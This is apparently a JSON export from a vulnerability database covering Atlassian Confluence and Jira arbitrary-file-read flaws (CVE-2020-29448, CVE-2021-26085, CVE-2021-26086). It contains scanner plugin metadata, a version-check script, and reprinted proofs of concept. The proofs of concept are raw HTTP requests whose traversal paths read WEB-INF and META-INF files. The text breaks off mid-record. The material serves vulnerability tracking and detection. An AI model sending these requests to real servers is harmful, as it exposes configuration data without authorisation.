It is, therefore, affected by an incorrect path access check vulnerability allowing unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-05T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.18 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-29448"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112860", "href": "https://www.tenable.com/plugins/was/112860", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T12:05:49", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.18, 6.14.x < 7.4.6 or 7.5.x < 7.8.3. 
It is, therefore, affected by an incorrect path access check vulnerability allowing unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-05T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 7.4.6 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-29448"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112861", "href": "https://www.tenable.com/plugins/was/112861", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-12T16:50:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.18, 6.14.x prior to 7.4.6 or 7.5.x prior to 7.8.3. It is, therefore, affected by an arbitrary file read vulnerability in its ConfluenceResourceDownloadRewriteRule class due to an incorrect path access check. 
An unauthenticated, remote attacker can exploit this to read arbitrary files within WEB-INF and META-INF.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-02-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.18 / 6.14 < 7.4.6 / 7.5 < 7.8.3 Arbitrary File Read (CONFSERVER-60469)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-29448"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-60469.NASL", "href": "https://www.tenable.com/plugins/nessus/146869", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146869);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2020-29448\");\n script_xref(name:\"IAVA\", value:\"2021-A-0105-S\");\n\n script_name(english:\"Atlassian Confluence < 6.13.18 / 6.14 < 7.4.6 / 7.5 < 7.8.3 Arbitrary File Read (CONFSERVER-60469)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an arbitrary file read vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.18, 6.14.x prior to 7.4.6 or 7.5.x prior to 7.8.3. It is, therefore, affected by an arbitrary file\nread vulnerability in its ConfluenceResourceDownloadRewriteRule class due to an incorrect path access check. 
An \nunauthenticated, remote attacker can exploit this to read arbitrary files within WEB-INF and META-INF.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-60469\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.18, 7.4.6, 7.8.3, 7.9.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-29448\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nport = get_http_port(default:80);\napp_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nconstraints = [\n {'fixed_version' : '6.13.18' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.6' },\n {'min_version' : '7.5', 'fixed_version' : '7.8.3', 'fixed_display' : '7.8.3 / 7.9.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T12:06:00", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.18, 6.14.x < 7.4.6 or 7.5.x < 7.8.3. It is, therefore, affected by an incorrect path access check vulnerability allowing unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-05T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.8.3 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-29448"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112862", "href": "https://www.tenable.com/plugins/was/112862", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:17", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is 
prior to 8.5.14, 8.6.x < 8.13.6 or 8.14.x < 8.16.1. It is, therefore, affected by a path traversal vulnerability in the /WEB-INF/web.xml endpoint allowing remote attackers to read particular files.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Jira < 8.5.14 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112954", "href": "https://www.tenable.com/plugins/was/112954", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:12", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 8.5.14, 8.6.x < 8.13.6 or 8.14.x < 8.16.1. 
It is, therefore, affected by a path traversal vulnerability in the /WEB-INF/web.xml endpoint allowing remote attackers to read particular files.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Jira 8.14.x < 8.16.1 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112956", "href": "https://www.tenable.com/plugins/was/112956", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:07", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 8.5.14, 8.6.x < 8.13.6 or 8.14.x < 8.16.1. 
It is, therefore, affected by a path traversal vulnerability in the /WEB-INF/web.xml endpoint allowing remote attackers to read particular files.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Jira 8.6.x < 8.13.6 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112955", "href": "https://www.tenable.com/plugins/was/112955", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-21T19:39:56", "description": "An arbitrary file read vulnerability exists in the /s/ endpoint of Atlassian Confluence Server. An unauthenticated, remote attacker can abuse this vulnerability to view restricted resources", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-10-20T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Arbitrary File Read (CVE-2021-26085)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26085"], "modified": "2022-06-21T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2021-26085.NBIN", "href": "https://www.tenable.com/plugins/nessus/154244", "sourceData": "Binary data confluence_cve-2021-26085.nbin", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:15", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 7.4.10 or 7.5.x prior to 7.12.3. 
It is, therefore, affected by a pre-authorization arbitrary file read vulnerability in the /s/ endpoint.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.12.3 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112966", "href": "https://www.tenable.com/plugins/was/112966", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:10", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 7.4.10 or 7.5.x prior to 7.12.3. 
It is, therefore, affected by a pre-authorization arbitrary file read vulnerability in the /s/ endpoint.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 7.4.10 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112965", "href": "https://www.tenable.com/plugins/was/112965", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-03-30T20:29:27", "description": "# CVE-2021-26086\nAtlassian Jira Server/Data Center 8.4.0 - Limit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-10-05T14:09:52", "type": "githubexploit", "title": "Exploit for Path Traversal in Atlassian Jira Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26086"], "modified": "2022-03-24T06:27:56", "id": "9413B7EF-463D-5026-9383-8878A2BD51D2", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:36", "description": "## CVE-2021-26085\nIdeas from: https://github.com/ColdFusionX/CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-06T20:03:22", "type": "githubexploit", "title": "Exploit for Missing Authorization in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-06T20:11:41", "id": "B3FA9C79-AA38-5ADB-8E71-898783D49FB4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-25T07:17:16", "description": "# CVE-2021-26085\nAtlassian Confluence Server 7.5.1 Pre-Authoriza...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": 
"NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-10-05T08:20:25", "type": "githubexploit", "title": "Exploit for Missing Authorization in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2022-02-25T06:52:29", "id": "7568F9C3-3A35-590E-90A2-866D5C8D59B2", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-04T15:49:50", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-05T00:00:00", "type": "zdt", "title": "Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 
5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-05T00:00:00", "id": "1337DAY-ID-36852", "href": "https://0day.today/exploit/description/36852", "sourceData": "# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read\n# Exploit Author: Mayank Deshmukh\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/jira/download/data-center\n# Version: versions < 8.5.14, 8.6.0 \u2264 version < 8.13.6, 8.14.0 \u2264 version < 8.16.1\n# Tested on: Kali Linux & Windows 10\n# CVE : CVE-2021-26086\n\nPOC File #1 - web.xml\n\nGET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n\nPOC File #2 - seraph-config.xml\n\nGET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC File #3 - decorators.xml\n\nGET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 
Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n\nPOC File #4 - /jira-webapp-dist/pom.properties\n\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC File #5 - /jira-webapp-dist/pom.xml\n\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC File #6 - /atlassian-jira-webapp/pom.xml\n\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC File #7 - /atlassian-jira-webapp/pom.properties\n\nGET 
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n", "sourceHref": "https://0day.today/exploit/36852", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-11T23:53:34", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-10-05T00:00:00", "type": "zdt", "title": "Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-05T00:00:00", "id": "1337DAY-ID-36851", "href": "https://0day.today/exploit/description/36851", "sourceData": "# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary 
File Read\n# Exploit Author: Mayank Deshmukh\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: version < 7.4.10 and 7.5.0 \u2264 version < 7.12.3\n# Tested on: Kali Linux & Windows 10\n# CVE : CVE-2021-26085\n\nPOC #1 - web.xml\n\nGET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1\nHost: 127.0.0.1:8090\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC #2 - seraph-config.xml\n\nGET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1\nHost: 127.0.0.1:8090\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC #3 - pom.properties\n\nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1\nHost: 127.0.0.1:8090\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC #4 - pom.xml\n\nGET 
/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1\nHost: 127.0.0.1:8090\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n", "sourceHref": "https://0day.today/exploit/36851", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2021-08-20T07:29:10", "description": "", "cvss3": {}, "published": "2021-08-20T00:00:00", "type": "seebug", "title": "Atlassian Jira \u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff08CVE-2021-26086\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-08-20T00:00:00", "id": "SSV:99336", "href": "https://www.seebug.org/vuldb/ssvid-99336", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2021-10-05T15:04:08", "description": "", "cvss3": {}, "published": "2021-10-05T00:00:00", "type": "packetstorm", "title": "Atlassian Jira Server/Data Center 8.4.0 File Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-05T00:00:00", "id": "PACKETSTORM:164405", "href": "https://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html", "sourceData": "`# Exploit Title: Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include \n# Date: 2021-10-05 \n# Exploit Author: Mayank Deshmukh \n# Vendor Homepage: https://www.atlassian.com/ 